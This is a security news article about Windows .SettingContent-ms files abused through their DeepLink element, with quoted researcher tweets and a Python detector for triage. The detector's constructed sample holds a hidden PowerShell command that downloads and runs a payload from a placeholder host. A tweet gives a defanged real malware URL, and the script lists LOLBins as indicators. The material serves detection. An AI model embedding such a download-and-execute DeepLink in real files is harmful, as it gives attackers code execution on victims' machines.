Malware authors are frantically trying to weaponize a new infection vector that was revealed at the start of June.
The trick relies on Windows Settings shortcut files (.SettingContent-ms): the file is XML, and its DeepLink element holds a command line that Windows runs when the file is opened, which gives an attacker code execution on Windows 10 PCs.
Ever since SpecterOps security researcher Matt Nelson published his research on the matter three weeks ago, malware authors have been playing around with proof-of-concept code in an attempt to craft an exploit that can deploy malware on a victim's system.
With each passing day, more and more exploits are being uploaded to VirusTotal. FireEye security researcher Nick Carr has been avidly tracking these uploads for the past two weeks and has been documenting new findings in a series of Twitter threads.
yawn.SettingContent-ms
Exploring POCs and attacker usage of a particular method like @enigma0x3's responsibly-disclosed #DeepLink technique is mostly uneventful. We'll try to keep sharing some interesting public samples as the technique trickles downstream. pic.twitter.com/zeKQdtTUpQ
— Nick Carr (@ItsReallyNick) July 3, 2018
But while previous uploads have been mostly inept tests [1, 2], in recent days crooks have also put together the first exploit chain that uses a SettingContent-ms file to download and install an actual malware sample.
"Quotation_Request_Sheet.SettingContent-ms"
#DeepLink @enigma0x3 method
0 static AV detections in VT
Uses PowerShell to download & launch hxxps://lanitida[.]net/LAW231.exe
Uploaded just now (2 min ago): https://t.co/2OC6vzrXyw pic.twitter.com/84oTsnE7dm
— Nick Carr (@ItsReallyNick) July 2, 2018
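The sample Carr describes above stands out because its DeepLink runs PowerShell to fetch a second stage, whereas the stock Windows settings shortcuts point at the Control Panel. As an added triage example (this is not code from the article, from Carr, or from Nelson's research), the Python script below pulls the DeepLink command out of .SettingContent-ms files and flags any that launch something other than the stock Control Panel target. The two sample files are constructed for the example, the indicator list is my own choice, and the example.invalid URL is a placeholder, not an indicator from the sample Carr found.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample files (not real VirusTotal uploads). The first mirrors the
# layout of a stock Windows 10 settings shortcut; the second carries an
# attacker-style DeepLink that downloads and runs a second stage.
SAMPLES = {
    "control_panel.SettingContent-ms": """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>%windir%\\system32\\control.exe</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>""",
    "Quotation_Request_Sheet.SettingContent-ms": """<?xml version="1.0" encoding="UTF-8"?>
<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>powershell.exe -nop -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/payload.exe','%TEMP%\\p.exe'); Start-Process '%TEMP%\\p.exe'"</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
    <SettingInformation>
      <Description>@shell32.dll,-4161</Description>
      <Keywords>@shell32.dll,-4161</Keywords>
    </SettingInformation>
  </SearchableContent>
</PCSettings>""",
}

# The only DeepLink target a stock settings shortcut is expected to carry
# (optionally followed by control.exe arguments). Assumption made for this example.
EXPECTED_TARGET = re.compile(r"^%windir%\\system32\\control\.exe(\s|$)", re.IGNORECASE)

# Interpreters, LOLBins and download primitives that have no business in a
# settings shortcut. Indicator list chosen for this example, not from the article.
SUSPICIOUS = re.compile(
    r"\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32|certutil|"
    r"bitsadmin|msiexec|iex|invoke-expression)\b|https?://|downloadfile|"
    r"downloadstring|frombase64",
    re.IGNORECASE,
)


def extract_deeplink(xml_text):
    """Return the text of the first DeepLink element, ignoring XML namespaces."""
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError:
        return None
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "DeepLink":
            return (el.text or "").strip()
    return None


def classify(xml_text):
    """Classify one .SettingContent-ms file by what its DeepLink would execute."""
    deeplink = extract_deeplink(xml_text)
    if deeplink is None:
        return {"deeplink": None, "verdict": "malformed", "indicators": []}
    if EXPECTED_TARGET.match(deeplink):
        return {"deeplink": deeplink, "verdict": "benign", "indicators": []}
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(deeplink)})
    # Anything that is not the Control Panel is worth a look; known tooling
    # in the command line raises it to suspicious.
    verdict = "suspicious" if hits else "unexpected"
    return {"deeplink": deeplink, "verdict": verdict, "indicators": hits}


def scan_all(samples=SAMPLES):
    """Map each file name to its verdict, the way a VT-feed triage loop would."""
    return {name: classify(text)["verdict"] for name, text in samples.items()}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        result = classify(text)
        print(f"{name}: {result['verdict']} {result['indicators']}")
        print(f"  DeepLink: {result['deeplink']}")
```

On a real triage pass you would feed it the files themselves (they are plain UTF-8 XML, so `open(path, encoding="utf-8").read()` is enough) and treat any "unexpected" verdict as a manual-review item rather than a clean bill of health, since the indicator list only catches tooling it knows about.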
While you could attribute some of these VirusTotal uploads to security researchers playing around with Nelson's PoC, the discovery of a weaponized exploit suggests that some malware distributors are serious about their tests, and it is telling about their intentions.
Jérôme Segura, a Malwarebytes security researcher who also penned a blog post about the weaponized SettingContent-ms exploit that Carr discovered, told Bleeping Computer he also expects this to be integrated into live distribution campaigns.
"Its name 'quotation' is very much like a lure we see in malspam," Segura said referring to the VT upload's name of "Quotation_Request_Sheet.SettingContent-ms."
But the rise in weaponized SettingContent-ms exploits uploaded on VirusTotal has also sparked discussions in the infosec community about the practice of blogging about offensive hacking tricks, like the Nelson article about the SettingContent-ms technique.
You can follow the discussion via this Twitter thread, where some argue for keeping such techniques secret, while others argue that "security through obscurity" only helps attackers.
One of the most interesting replies in this conversation came from Justin Warner, technical director at cyber-security firm ICEBRG.
"A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release," Warner said. "[A public offensive hacking technique] lures threats to predictable detection points."
A really interesting side effect of releasing the tradecraft is funneling actors to predictable behaviors, that are generally documented and easily studied after release. Lures threats to predictable detection points. I know there is risk and other nuance, but somewhat helpful— Justin Warner (@sixdub) July 3, 2018
Image credits: Nick Carr